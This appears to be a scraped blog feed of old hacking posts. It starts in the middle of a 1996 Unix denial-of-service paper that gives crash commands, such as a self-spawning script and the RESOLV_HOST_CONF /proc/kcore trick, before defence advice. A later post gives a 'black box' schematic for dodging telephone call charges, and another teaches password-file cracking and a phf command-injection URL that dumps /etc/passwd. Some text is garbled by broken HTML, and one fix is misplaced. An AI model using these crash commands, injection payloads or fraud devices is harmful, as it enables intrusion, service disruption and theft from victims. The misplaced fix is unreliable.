the first example if you have a shell.<br />
<br />
.D.7. DIRECTORY NAME LOOKUPCACHE<br />
--------------------------------<br />
<br />
Directory name lookupcache (DNLC) is used whenever a file is opened.<br />
DNLC associates the name of the file to a vnode. But DNLC can only<br />
operate on files with names that has less than N characters (for SunOS 4.x<br />
up to 14 character, for Solaris 2.x up 30 characters). This means<br />
that it's dead easy to launch a pretty discreet denial of service attack.<br />
<br />
Create lets say 20 directories (for a start) and put 10 empty files in<br />
every directory. Let every name have over 30 characters and execute a<br />
script that makes a lot of ls -al on the directories.<br />
<br />
If the impact is not big enough you should create more files or launch<br />
more processes.<br />
<br />
.D.8. CSH ATTACK<br />
----------------<br />
<br />
Just start this under /bin/csh (after proper modification) <br />
and the load level will get very high (that is 100% of the cpu time) <br />
in a very short time. <br />
<br />
Ex:<br />
<br />
|I /bin/csh<br />
nodename : **************b<br />
<br />
.D.9. CREATING FILES IN /tmp<br />
----------------------------<br />
<br />
Many programs creates files in /tmp, but are unable to deal with the problem<br />
if the file already exist. In some cases this could be used for a<br />
denial of service attack.<br />
<br />
.D.10. USING RESOLV_HOST_CONF<br />
-----------------------------<br />
<br />
Some systems have a little security hole in the way they use the<br />
RESOLV_HOST_CONF variable. That is we can put things in it and<br />
through ping access confidential data like /etc/shadow or<br />
crash the system. Most systems will crash if /proc/kcore is <br />
read in the variable and access through ping.<br />
<br />
Ex:<br />
<br />
$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf<br />
<br />
.D.11. SUN 4.X AND BACKGROUND JOBS <br />
----------------------------------<br />
<br />
Thanks to Mr David Honig <honig@amada.net> for the following:<br />
<br />
" Put the string "a&" in a file called "a" and perform "chmod +x a".<br />
Running "a" will quickly disable a Sun 4.x machine, even disallowing<br />
(counter to specs) root login as the kernel process table fills."<br />
<br />
" The cute thing is the size of the <br />
script, and how few keystrokes it takes to bring down a Sun<br />
as a regular user."<br />
<br />
.D.12. CRASHING DG/UX WITH ULIMIT <br />
---------------------------------<br />
<br />
ulimit is used to set a limit on the system resources available to the <br />
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the <br />
passwd file be set to zero.<br />
<br />
.D.13. NETTUNE AND HP-UX<br />
------------------------<br />
<br />
/usr/contrib/bin/nettune is SETUID root on HP-UX meaning<br />
that any user can reset all ICMP, IP and TCP kernel<br />
parameters, for example the following parameters:<br />
<br />
- arp_killcomplete <br />
- arp_killincomplete<br />
- arp_unicast <br />
- arp_rebroadcast<br />
- icmp_mask_agent<br />
- ip_defaultttl<br />
- ip_forwarding<br />
- ip_intrqmax<br />
- pmtu_defaulttime<br />
- tcp_localsubnets<br />
- tcp_receive<br />
- tcp_send<br />
- tcp_defaultttl<br />
- tcp_keepstart <br />
- tcp_keepfreq<br />
- tcp_keepstop<br />
- tcp_maxretrans<br />
- tcp_urgent_data_ptr<br />
- udp_cksum<br />
- udp_defaultttl <br />
- udp_newbcastenable <br />
- udp_pmtu<br />
- tcp_pmtu<br />
- tcp_random_seq<br />
<br />
The solution could be to set the proper permission on <br />
/sbin/mount_union:<br />
<br />
#chmod u-s /sbin/mount_union<br />
<br />
.D.14. SOLARIS 2.X AND NFS<br />
--------------------------<br />
<br />
If a process is writing over NFS and the user goes over the disk<br />
quota will the process go into an infinite loop.<br />
<br />
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION<br />
--------------------------------------------------<br />
<br />
By executing a sequence of mount_union commands any user<br />
can cause a system reload on all FreeBSD version 2.X before<br />
1996-05-18.<br />
<br />
$ mkdir a<br />
$ mkdir b<br />
$ mount_union ~/a ~/b<br />
$ mount_union -b ~/a ~/b<br />
<br />
The solution could be to set the proper permission on <br />
/sbin/mount_union:<br />
<br />
#chmod u-s /sbin/mount_union<br />
<br />
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X<br />
----------------------------------------------------<br />
<br />
Executing the trap_mon instruction from user mode can cause<br />
a kernel panic or a window underflow watchdog reset under<br />
SunOS 4.1.x, sun4c architecture.<br />
<br />
<br />
.E. DUMPING CORE<br />
~~~~~~~~~~~~~~~~<br />
<br />
.E.1. SHORT COMMENT<br />
-------------------<br />
<br />
The core dumps things don't really belongs in this paper but I have<br />
put them here anyway.<br />
<br />
.E.2. MALICIOUS USE OF NETSCAPE<br />
-------------------------------<br />
<br />
Under Netscape 1.1N this link will result in a segmentation fault and a<br />
core dump.<br />
<br />
Ex:<br />
<br />
<a .="" asked="" computer="" faq:="" frequently="" href="" name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.<br> xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.<br> xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.<br> xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.<br> xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...><br><br>.E.3. CORE DUMPED UNDER WUFTPD<br>------------------------------<br><br>A core dumped could be created under wuftp with two different<br>methods:<br><br> (1) Then pasv is given (user not logged in (ftp -n)). Almost all<br> versions of BSD:s ftpd.<br> (2) More than 100 arguments is given with any executable<br> command. Presents in all versions of BSD:sd ftpd.<br><br>.E.4. ld UNDER SOLARIS/X86<br>--------------------------<br><br>Under Solaris 2.4/X86 ld dumps core if given with the -s option.<br><br><br>.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>.F.1. BASIC SECURITY PROTECTION<br>-------------------------------<br><br>.F.1.1. INTRODUCTION<br>--------------------<br><br>You can not make your system totally secured against denial of service<br>attacks but for attacks from the outside you can do a lot. I put this<br>work list together and hope that it can be of some use. <br><br>.F.1.2. SECURITY PATCHES<br>------------------------<br><br>Always install the proper security patches. As for patch numbers<br>I don't want to put them out, but that doesn't matter because you<br>anyway want to check that you have all security patches installed,<br>so get a list and check! Also note that patches change over time and<br>that a solution suggested in security bulletins (i.e. CERT) often<br>is somewhat temporary.<br><br>.F.1.3. PORT SCANNING<br>---------------------<br><br>Check which services you have. Don't check with the manual<br>or some configuration file, instead scan the ports with sprobe<br>or some other port scanner. Actual you should do this regualy to see<br>that anyone don't have installed a service that you don't want on<br>the system (could for example be service used for a pirate site).<br><br>Disable every service that you don't need, could for example be rexd,<br>fingerd, systat, netstat, rusersd, sprayd, pop3, uucpd, echo, chargen,<br>tftp, exec, ufs, daytime, time... Any combination of echo, time, daytime<br>and chargen is possible to get to loop. There is however no need<br>to turn discard off. The discard service will just read a packet<br>and discard it, so if you turn off it you will get more sensitive to<br>denial of service and not the opposite.<br><br>Actual can services be found on many systems that can be used for<br>denial of service and brute force hacking without any logging. For<br>example Stock rexec never logs anything. Most popd:s also don't log <br>anything<br><br>.F.1.4. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER<br>---------------------------------------------------------<br><br>Check that attacks described in this paper and look at the<br>solution. Some attacks you should perform yourself to see if they<br>apply to your system, for example:<br><br> - Freezing up X-Windows.<br> - Malicious use of telnet.<br> - How to disable services.<br> - SunOS kernel panic.<br> - Attacking with lynx clients.<br> - Crashing systems with ping from Windows 95 machines.<br> <br>That is stress test your system with several services and look at<br>the effect.<br><br>Note that Solaris 2.4 and later have a limit on the number of ICMP<br>error messages (1 per 500 ms I think) that can cause problems then<br>you test your system for some of the holes described in this paper.<br>But you can easy solve this problem by executing this line:<br><br>$ /usr/sbin/ndd -set /dev/ip ip_icmp_err_interval 0<br> <br>.F.1.5. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER<br>--------------------------------------------------------<br><br>Check the inside attacks, although it is always possibly to crash<br>the system from the inside you don't want it to be to easy. Also<br>have several of the attacks applications besides denial of service,<br>for example:<br><br> - Crashing the X-Server: If stickybit is not set in /tmp<br> a number of attacks to gain<br> access can be performed.<br><br> - Using resolv_host_conf: Could be used to expose<br> confidential data like<br> /etc/shadow.<br><br> - Core dumped under wuftpd: Could be used to extract<br> password-strings.<br><br>If I don't have put out a solution I might have recommended son other paper.<br>If not I don't know of a paper with a solution I feel that I can recommend.<br>You should in these causes check with your company.<br><br>.F.1.6. EXTRA SECURITY SYSTEMS<br>------------------------------<br><br>Also think about if you should install some extra security systems.<br>The basic that you always should install is a logdaemon and a wrapper.<br>A firewall could also be very good, but expensive. Free tools that can<br>be found on the Internet is for example:<br><br>TYPE: NAME: URL:<br><br>LOGDAEMON NETLOG ftp://net.tamu.edu/pub/security/TAMU<br>WRAPPER TCP WRAPPERS ftp://cert.org/pub/tools/tcp_wrappers<br>FIREWALL TIS ftp://ftp.tis.com/pub/firewalls/toolkit<br><br>Note that you should be very careful if building your own firewall with<br>TIS or you might open up new and very bad security holes, but it is a very<br>good security packer if you have some basic knowledge.<br><br>It is also very good to replace services that you need, for example telnet,<br>rlogin, rsh or whatever, with a tool like ssh. Ssh is free and can be<br>found at URL: <br><br> ftp://ftp.cs.hut.fi/pub/ssh<br><br>The addresses I have put out are the central sites for distributing<br>and I don't think that you should use any other except for CERT.<br><br>For a long list on free general security tools I recommend:<br>" questions="" security=""><br />
<br />
.F.1.7. MONITORING SECURITY<br />
---------------------------<br />
<br />
Also monitor security regular, for example through examining system log<br />
files, history files... Even in a system without any extra security systems<br />
could several tools be found for monitoring, for example: <br />
<br />
- uptime<br />
- showmount<br />
- ps<br />
- netstat<br />
- finger<br />
<br />
(see the man text for more information).<br />
<br />
.F.1.8. KEEPING UP TO DATE<br />
--------------------------<br />
<br />
It is very important to keep up to date with security problems. Also <br />
understand that then, for example CERT, warns for something it has often<br />
been dark-side public for sometime, so don't wait. The following resources<br />
that helps you keeping up to date can for example be found on the Internet:<br />
<br />
- CERT mailing list. Send an e-mail to cert@cert.org to be placed<br />
on the list.<br />
<br />
- Bugtraq mailing list. Send an e-mail to bugtraq-request@fc.net.<br />
<br />
- WWW-security mailing list. Send an e-mail to <br />
www-security@ns2.rutgers.edu.<br />
<br />
.F.1.9. READ SOMETHING BIGGER AND BETTER<br />
----------------------------------------<br />
<br />
Let's start with papers on the Internet. I am sorry to say that it is not<br />
very many good free papers that can be found, but here is a small collection<br />
and I am sorry if have have over looked a paper.<br />
<br />
(1) The Rainbow books is a long series of free books on computer security.<br />
US citizens can get the books from:<br />
<br />
INFOSEC AWARENESS OFFICE<br />
National Computer Security Center<br />
9800 Savage Road<br />
Fort George G. Meader, MD 20755-600<br />
<br />
We other just have to read the papers on the World Wide Web. Every<br />
paper can not however be found on the Internet.<br />
<br />
(2) "Improving the security of your Unix system" by Curry is also very<br />
nice if you need the very basic things. If you don't now anything about<br />
computer security you can't find a better start. <br />
<br />
(3) "The WWW security FAQ" by Stein is although it deal with W3-security<br />
the very best better on the Internet about computer security.<br />
<br />
(4) CERT have aklso published several good papers, for example:<br />
<br />
- Anonymous FTP Abuses.<br />
- Email Bombing and Spamming.<br />
- Spoofed/Forged Email.<br />
- Protecting yourself from password file attacks.<br />
<br />
I think however that the last paper have overlooked several things.<br />
<br />
(5) For a long list on papers I can recommend:<br />
"FAQ: Computer Security Frequently Asked Questions".<br />
<br />
(6) Also see section ".G. SUGGESTED READING"<br />
<br />
You should also get some big good commercial book, but I don't want<br />
to recommend any.<br />
<br />
.F.2. MONITORING PERFORMANCE<br />
----------------------------<br />
<br />
.F.2.1. INTRODUCTION<br />
--------------------<br />
<br />
There is several commands and services that can be used for<br />
monitoring performance. And at least two good free programs can<br />
be found on Internet.<br />
<br />
.F.2.2. COMMANDS AND SERVICES<br />
-----------------------------<br />
<br />
For more information read the man text.<br />
<br />
netstat Show network status.<br />
nfsstat Show NFS statistics.<br />
sar System activity reporter.<br />
vmstat Report virtual memory statistics.<br />
timex Time a command, report process data and system<br />
activity.<br />
time Time a simple command.<br />
truss Trace system calls and signals.<br />
uptime Show how long the system has been up.<br />
<br />
Note that if a public netstat server can be found you might be able<br />
to use netstat from the outside. netstat can also give information<br />
like tcp sequence numbers and much more.<br />
<br />
.F.2.3. PROGRAMS<br />
----------------<br />
<br />
Proctool: Proctool is a freely available tool for Solaris that monitors<br />
and controls processes.<br />
ftp://opcom.sun.ca/pub/binaries/<br />
<br />
Top: Top might be a more simple program than Proctool, but is<br />
good enough.<br />
<br />
.F.2.4. ACCOUNTING<br />
------------------<br />
<br />
To monitor performance you have to collect information over a long <br />
period of time. All Unix systems have some sort of accounting logs<br />
to identify how much CPU time, memory each program uses. You should<br />
check your manual to see how to set this up.<br />
<br />
You could also invent your own account system by using crontab and<br />
a script with the commands you want to run. Let crontab run the script<br />
every day and compare the information once a week. You could for<br />
example let the script run the following commands:<br />
<br />
- netstat<br />
- iostat -D<br />
- vmstat<br />
<br />
<br />
.G. SUGGESTED READING<br />
~~~~~~~~~~~~~~~~~~~~~<br />
<br />
.F.1. INFORMATION FOR DEEPER KNOWLEDGE<br />
-------------------------------------<br />
<br />
(1) Hedrick, C. Routing Information Protocol. RFC 1058, 1988.<br />
(2) Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984.<br />
(3) Postel, J. Internet Control Message Protocol. RFC 792, 1981.<br />
(4) Harrenstien, K. NAME/FINGER Protocol, RFC 742, 1977.<br />
(5) Sollins, K.R. The TFTP Protocol, RFC 783, 1981.<br />
(6) Croft, W.J. Bootstrap Protocol, RFC 951, 1985.<br />
<br />
Many of the papers in this category was RFC-papers. A RFC-paper<br />
is a paper that describes a protocol. The letters RCS stands for<br />
Request For Comment. Hosts on the Internet are expected to understand<br />
at least the common ones. If you want to learn more about a protocol<br />
it is always good to read the proper RFC. You can find a nice sRFC <br />
index search form at URL:<br />
<br />
http://pubweb.nexor.co.uk/public/rfc/index/rfc.html<br />
<br />
.F.2. KEEPING UP TO DATE INFORMATION<br />
------------------------------------<br />
<br />
(1) CERT mailing list. Send an e-mail to cert@cert.org to be placed<br />
on the list.<br />
(2) Bugtraq mailinglist. Send an e-mail to bugtraq-request@fc.net.<br />
(3) WWW-security mailinglist. Send an e-mail to www-security@ns2.rutgers.edu.<br />
(4) Sun Microsystems Security Bulletins.<br />
(5) Various articles from: - comp.security.announce<br />
- comp.security.unix<br />
- comp.security.firewalls<br />
(6) Varius 40Hex Issues.<br />
<br />
.F.3. BASIC INFORMATION<br />
-----------------------<br />
<br />
(1) Husman, H. INTRODUKTION TILL DATASÄKERHET UNDER X-WINDOWS, 1995.<br />
(2) Husman, H. INTRODUKTION TILL IP-SPOOFING, 1995.<br />
(3) The following rainbow books: - Teal Green Book (Glossary of<br />
Computer Security Terms).<br />
- Bright Orange Book( A Guide<br />
to Understanding Security Testing<br />
and Test Documentation in Trusted<br />
Systems).<br />
- C1 Technical Report-001 <br />
(Computer Viruses: Preventation,<br />
Detection, and Treatment).<br />
(4) Ranum, Marcus. Firewalls, 1993.<br />
(5) Sun Microsystems, OpenWindows V3.0.1. User Commands, 1992.<br />
(6) Husman, H. ATT SPÅRA ODOKUMENTERADE SÄKERHETSLUCKOR, 1996.<br />
(7) Dark OverLord, Unix Cracking Tips, 1989.<br />
(8) Shooting Shark, Unix Nasties, 1988.<br />
(9) LaDue, Mark.D. Hostile Applets on the Horizone, 1996.<br />
(10) Curry, D.A. Improving the security of your unix system, 1990.<br />
(11) Stein, L.D. The World Wide Web security FAQ, 1995.<br />
(12) Bellovin, S.M. Security Problems in the TCP/IP Protocol, 1989.<br />
<br />
.H. COPYRIHT<br />
------------<br />
<br />
This paper is Copyright (c) 1996 by Hans Husman.<br />
<br />
Permission is hereby granted to give away free copies electronically. You<br />
may distribute, transfer, or spread this paper electronically. You may not<br />
pretend that you wrote it. This copyright notice must be maintained in any<br />
copy made. If you wish to reprint the whole or any part of this paper in any<br />
other medium excluding electronic medium, please ask the author for<br />
permission.<br />
<br />
.I. DISCLAIMER<br />
--------------<br />
<br />
The information within this paper may change without notice. Use of this<br />
information constitutes acceptance for use in an AS IS condition. There are<br />
NO warranties with regard to this information. In no event shall the author<br />
be liable for any damages whatsoever arising out of or in connection with<br />
the use or spread of this information. Any use of this information is at the<br />
user's own risk.</a></honig@amada.net></filename></iostream.h></unistd.h></sys>Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-52804567502292986982010-07-24T22:02:00.002+07:002010-07-24T22:02:59.971+07:00Increase your DialUp modem PerformanceYou can't assume that just because you connected at a speed like 48.3KBps that you will stay there. Today's modems automatically fall back to a lower speed if the line noise is too high to maintain a faster connection, but sometimes they fall back too soon or too far.<br />
<br />
Here's how to do it:<br />
<br />
<br />
Click Start the button.<br />
Select Settings.<br />
Click Control Panel.<br />
Double-click on the Modems icon.<br />
Select your modem.<br />
Click the Properties button.<br />
Click the Connections tab.<br />
Click the Advanced button.<br />
In the "Extra settings" field, type S36=7<br />
Click OK to save your settings.<br />
<br />
<br />
This will force your modem to try to stay connected at high speeds in two different ways before dropping back to an asynchronous mode with auto speed buffering.Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-27450567049272768052010-07-24T22:02:00.000+07:002010-07-24T22:02:16.728+07:00Kill Microsoft Instant MessengerThis will remove Microstufts Instant Messenger (MSN). This wotked in WinXP Pro, but may work on others....<br />
<br />
So, go to START-->RUN copy and paste the following:<br />
QUOTE<br />
RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove<br />
<br />
<br />
Clink ok. No more msn process lwink.gifAnonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-20691032484671158902010-07-24T22:01:00.001+07:002010-07-24T22:01:12.149+07:00How To Build Black BoxHow to build a black box?<br />
<br />
I found this tutorial quite a long time ago and I don't know if it still works. Nevertheless , it might be interresting to read, you might even learn something from it! I would have gladly given credit to it's author but won't since I have no idea who he is. So here is his tutorial that remained unchanged ( I hope!):<br />
<br />
A BLACK BOX<br />
is a device that is hooked up to your phone that fixes your phone so that when you get a call, the caller doesn't get charged for the call. This is good for calls up to 1/2 hour, after 1/2 hour the phone Co. gets suspicious, and then you can guess what happens.<br />
<br />
What this little beauty does is keep the line voltage from dropping to 10v when you answer your fone. The line is instead kept at 36v and it will make the fone think that it is still ringing while your talking. The reason for the 1/2 hour time limit is that the<br />
phone CO. thinks that something is wrong after 1/2 an hour of ringing.<br />
<br />
All parts are available at Radio Shack. Using the least possible parts and arangement, the cost is $0.98 !!!! And that is parts for two of them! Talk about a deal! If you want to splurge then you can get a small PC board, and a switch. There are two<br />
schematics for this box, one is for most normal fones. The second one is<br />
for fones that don't work with the first. It was made for use with a Bell<br />
Trimline touch tone fone.<br />
<br />
** Schematic 1 for most fones **<br />
** LED ON: BOX ON **<br />
<br />
FROM >--------------------GREEN-> TO<br />
LINE >--! 1.8k LED !---RED--> FONE<br />
!--///--!>--!<br />
! !<br />
------>/<-------<br />
SPST<br />
<br />
<br />
<br />
Parts: 1 1.8k 1/2 watt resistor<br />
1 1.5v LED<br />
1 SPST switch<br />
<br />
You may just have two wires which you connect together for the switch.<br />
<br />
<br />
** Schematic 2 for all fones **<br />
** LED ON: BOX OFF **<br />
<br />
FROM >---------------GREEN-> TO<br />
LINE >------- ---RED--> FONE<br />
! LED !<br />
-->/<--!>--<br />
! !<br />
---///---<br />
1.8k<br />
�Parts: 1 2 watt resistor<br />
1 1.5v LED<br />
1 DPST switch<br />
<br />
<br />
Here is the PC board layout that I recommend using. It is neat and is very easy to hook up.<br />
<br />
Schematic #1 Schematic #2<br />
<br />
************** ****************<br />
* * * ------- *<br />
* --<led>--- * * ! ! *<br />
* ! ! * * ! <switch> *<br />
* RESISTOR ! * * ! ! ! *<br />
* ! ! * * ! ! / *<br />
* -------- ! * * ! ! *<br />
* ! ! * * ! <led>! / *<br />
* --SWITCH-- * * ! ! *<br />
* ! ! * * ! ! / *<br />
L * ! ! * F L * ! ! ! * F<br />
I>RED- -RED>O I>RED- ---RED>O<br />
N>-----GREEN---->N N>-----GREEN------>N<br />
E * h * E E * * E<br />
************** ****************<br />
<br />
Once you have hooked up all the parts, you must figure out what set of wires go to the line and which go to the fone. This is because of the fact that LED's must be put in, in a certain direction. Depending on which way you put the LED is what controls what wires are for the line & fone.<br />
<br />
How to find out:<br />
<br />
Hook up the box in one direction using one set offor line and the other for fone.<br />
<br />
*NOTE* For Model I switch should be OFF.<br />
*NOTE* For Model ][ switch should be set to side connecting the led.<br />
<br />
Once you have hooked it up, then pick up the fone and see if the LED is on. If it is, the LED will be lit. If is doesn't light then switch the wires and try again. Once you know which are which then label them. *NOTE* - If neither directions worked then your<br />
�lable the switch in its current position as BOX ON.<br />
<br />
How to use it:<br />
<br />
The purpose of this box is for poeple who call you not to pay so it would make<br />
sence that it can only be used to receive! calls. When the box is *ON* then you may only recieve calls. Your fone will ring like normal and the LED on the box will flash. If you answer the fone now, then the LED will light and the caller will not be charged. Hang up the fone after you are done talking like normal. You will not be able to get a dial-tone or call when the box is on, so turn the box *OFF* for normal calls. I don't recommend that you leave it on all the time, as you don't want it to answer when Ma Bell calls!<br />
<br />
Hope it brought something to those who read it.<br />
<br />
XIII<br />
numberXIII@Phreaker.net</led></switch></led>Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-64334035248181261192010-07-24T21:59:00.002+07:002010-07-24T21:59:54.491+07:00Hacking Web PagesChapter 4: Hacking Webpages<br />
<br />
Getting the Password File Through FTP<br />
<br />
Ok well one of the easiest ways of getting superuser access is through<br />
anonymous ftp access into a webpage. First you need learn a little about<br />
the password file...<br />
<br />
root:User:d7Bdg:1n2HG2:1127:20:Superuser<br />
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh<br />
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh<br />
<br />
This is an example of a regular encrypted password file. The Superuser is<br />
the part that gives you root. That's the main part of the file.<br />
<br />
root:x:0:1:Superuser:/:<br />
ftp:x:202:102:Anonymous ftp:/u1/ftp:<br />
ftpadmin:x:203:102:ftp Administrator:/u1/ftp<br />
<br />
This is another example of a password file, only this one has one little<br />
difference, it's shadowed. Shadowed password files don't let you view or<br />
copy the actual encrypted password. This causes problems for the password<br />
cracker and dictionary maker(both explained later in the text). Below is<br />
another example of a shadowed password file:<br />
<br />
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh<br />
daemon:x:1:1:0000-Admin(0000):/:<br />
bin:x:2:2:0000-Admin(0000):/usr/bin:<br />
sys:x:3:3:0000-Admin(0000):/:<br />
adm:x:4:4:0000-Admin(0000):/var/adm:<br />
lp:x:71:8:0000-lp(0000):/usr/spool/lp:<br />
smtp:x:0:0:mail daemon user:/:<br />
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:<br />
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico<br />
listen:x:37:4:Network Admin:/usr/net/nls:<br />
nobody:x:60001:60001:uid no body:/:<br />
noaccess:x:60002:60002:uid no access:/:<br />
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh<br />
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false<br />
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false<br />
<br />
Shadowed password files have an "x" in the place of a password or sometimes<br />
they are disguised as an * as well.<br />
<br />
Now that you know a little more about what the actual password file looks<br />
like you should be able to identify a normal encrypted pw from a shadowed<br />
pw file. We can now go on to talk about how to crack it.<br />
<br />
Cracking a password file isn't as complicated as it would seem, although the<br />
files vary from system to system. 1.The first step that you would take is<br />
to download or copy the file. 2. The second step is to find a password<br />
cracker and a dictionary maker. Although it's nearly impossible to find a<br />
good cracker there are a few ok ones out there. I recomend that you look<br />
for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper.<br />
Now for a dictionary maker or a dictionary file... When you start a<br />
cracking prog you will be asked to find the the password file. That's where<br />
a dictionary maker comes in. You can download one from nearly every hacker<br />
page on the net. A dictionary maker finds all the possible letter<br />
combinations with the alphabet that you choose(ASCII, caps, lowercase, and<br />
numeric letters may also be added) . We will be releasing our pasword file<br />
to the public soon, it will be called, Psychotic Candy, "The Perfect Drug."<br />
As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives<br />
you.<br />
<br />
<br />
The PHF Technique<br />
<br />
Well I wasn't sure if I should include this section due to the fact that<br />
everybody already knows it and most servers have already found out about<br />
the bug and fixed it. But since I have been asked questions about the phf<br />
I decided to include it.<br />
<br />
The phf technique is by far the easiest way of getting a password file<br />
(although it doesn't work 95% of the time). But to do the phf all you do<br />
is open a browser and type in the following link:<br />
<br />
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd <br />
<br />
You replace the webpage_goes_here with the domain. So if you were trying to<br />
get the pw file for www.webpage.com you would type:<br />
<br />
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd<br />
<br />
and that's it! You just sit back and copy the file(if it works).<br />
<br />
The best way to get root is with an exploit. Exploits are explained in the<br />
next chapter.Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0